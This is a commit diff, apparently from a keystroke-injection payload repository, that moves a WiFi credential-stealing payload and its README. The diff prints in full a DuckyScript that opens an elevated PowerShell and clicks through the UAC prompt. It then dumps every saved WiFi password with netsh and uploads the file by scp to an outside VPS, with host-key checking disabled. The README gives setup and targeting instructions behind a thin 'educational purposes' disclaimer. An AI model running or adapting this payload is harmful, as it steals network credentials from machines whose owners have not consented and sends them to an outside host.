Moved WiFi-Passwords-Exfiltration files to exfiltration directory
Robert Naame
parent
50812cddfa
commit
17b28cd2ee
|
|
@ -1,40 +0,0 @@
|
||||||
# WiFi Passwords Exfiltration via SCP
|
|
||||||
|
|
||||||
## Author: zb0r
|
|
||||||
## Version: 1.0
|
|
||||||
|
|
||||||
Welcome to the WiFi Passwords Exfiltration via SCP payload! This payload is designed to find WiFi SSIDs and passwords on a Windows machine, save them to a file, and then exfiltrate the file to your VPS using SCP. It's a handy tool for white-hat penetration testers or anyone needing to gather WiFi credentials for legitimate purposes.
|
|
||||||
|
|
||||||
### How It Works
|
|
||||||
|
|
||||||
1. **Windows Detection**: The script checks if it's running on a Windows machine.
|
|
||||||
2. **PowerShell Execution**: It opens PowerShell in hidden mode.
|
|
||||||
3. **WiFi Profiles and Passwords**: The script retrieves all WiFi profiles and their respective passwords from the machine.
|
|
||||||
4. **Save to File**: It saves this information to a text file in the temporary directory.
|
|
||||||
5. **Exfiltrate via SCP**: The file is then securely copied to your VPS using SCP.
|
|
||||||
|
|
||||||
### Prerequisites
|
|
||||||
|
|
||||||
1. **A VPS**: You'll need a VPS where you can receive the exfiltrated file. If you don't have one, you can set up a simple Linux VPS on platforms like DigitalOcean, AWS, or any provider of your choice.
|
|
||||||
2. **Modify the Script**: Before running the payload, replace the placeholder values for the VPS username, password, and IP address with your actual VPS details.
|
|
||||||
|
|
||||||
```plaintext
|
|
||||||
DEFINE #VPS_IP your_vps_ip
|
|
||||||
DEFINE #VPS_USER your_vps_username
|
|
||||||
DEFINE #VPS_PASS your_vps_password
|
|
||||||
Script Breakdown
|
|
||||||
The script includes the following key parts:
|
|
||||||
|
|
||||||
Open PowerShell: Opens PowerShell in hidden mode.
|
|
||||||
Retrieve WiFi Profiles: Runs netsh wlan show profiles to list all WiFi profiles.
|
|
||||||
Get WiFi Passwords: Retrieves the password for each profile by running netsh wlan show profile name=$profile key=clear.
|
|
||||||
Save to File: Saves the collected information to a text file in the temporary directory.
|
|
||||||
Securely Copy via SCP: Uses SCP with the -o StrictHostKeyChecking=no option to automatically accept new host keys and copies the file to the specified directory on the VPS.
|
|
||||||
Usage Instructions
|
|
||||||
Prepare the Script: Edit the script to include your VPS details.
|
|
||||||
Deploy the Payload: Run the script on the target Windows machine.
|
|
||||||
Check Your VPS: The WiFi credentials file should be securely transferred to your VPS.
|
|
||||||
Disclaimer
|
|
||||||
This script is intended for educational purposes and legitimate use only. Unauthorized use of this script on devices you do not own or have explicit permission to test is illegal and unethical. Always ensure you have proper authorization before running any penetration testing tools or scripts.
|
|
||||||
|
|
||||||
Enjoy and happy testing!
|
|
||||||
|
|
@ -1,51 +0,0 @@
|
||||||
|
|
||||||
REM Title: WiFi Passwords Exfiltration via SCP
|
|
||||||
REM Author: zb0r
|
|
||||||
REM Version: 1.0
|
|
||||||
REM Description: This script finds WiFi SSIDs and passwords on a Windows machine, saves them to a file, and sends the file to a VPS using SCP.
|
|
||||||
REM You need a VPS to use this script. Replace the #VPS_USER with your VPS username, #VPS_PASS with your VPS password, and #VPS_IP with your VPS IP address.
|
|
||||||
|
|
||||||
REM Passive Windows Detection Extension
|
|
||||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
|
||||||
|
|
||||||
DEFINE #VPS_IP 22.22.22.22
|
|
||||||
DEFINE #VPS_USER testuser
|
|
||||||
DEFINE #VPS_PASS testpassword
|
|
||||||
|
|
||||||
REM Open PowerShell as admin
|
|
||||||
GUI r
|
|
||||||
DELAY 500
|
|
||||||
STRING powershell
|
|
||||||
CTRL SHIFT ENTER
|
|
||||||
DELAY 1000
|
|
||||||
LEFT
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
|
||||||
|
|
||||||
REM Find WiFi profiles and passwords
|
|
||||||
STRINGLN $profiles = (netsh wlan show profiles) | Select-String "All User Profile" | ForEach-Object { $_ -replace " All User Profile : ", "" } | ForEach-Object { $_.Trim() }
|
|
||||||
DELAY 500
|
|
||||||
|
|
||||||
STRINGLN $wifiInfo = @()
|
|
||||||
DELAY 500
|
|
||||||
|
|
||||||
STRINGLN foreach ($profile in $profiles) { $profileName = $profile; $profileInfo = (netsh wlan show profile name=$profile key=clear) | Select-String "SSID", "Key Content"; $wifiInfo += [PSCustomObject]@{ ProfileName = $profileName; Password = $profileInfo -replace ".*Key Content : ", "" } }
|
|
||||||
DELAY 500
|
|
||||||
|
|
||||||
REM Save WiFi information to a file
|
|
||||||
STRINGLN $filePath = "$env:TEMP\wifi_profiles.txt"
|
|
||||||
DELAY 500
|
|
||||||
|
|
||||||
STRINGLN $wifiInfo | Format-Table -AutoSize | Out-File -FilePath $filePath
|
|
||||||
DELAY 2000
|
|
||||||
|
|
||||||
REM Upload the file via SCP to the target server
|
|
||||||
STRINGLN scp -o StrictHostKeyChecking=no $filePath #VPS_USER@#VPS_IP:/home/#VPS_USER/Desktop/wifipass.txt
|
|
||||||
DELAY 500
|
|
||||||
|
|
||||||
REM Enter the VPS password
|
|
||||||
STRINGLN #VPS_PASS
|
|
||||||
DELAY 1000
|
|
||||||
|
|
||||||
STRINGLN EXIT
|
|
||||||
Loading…
Reference in New Issue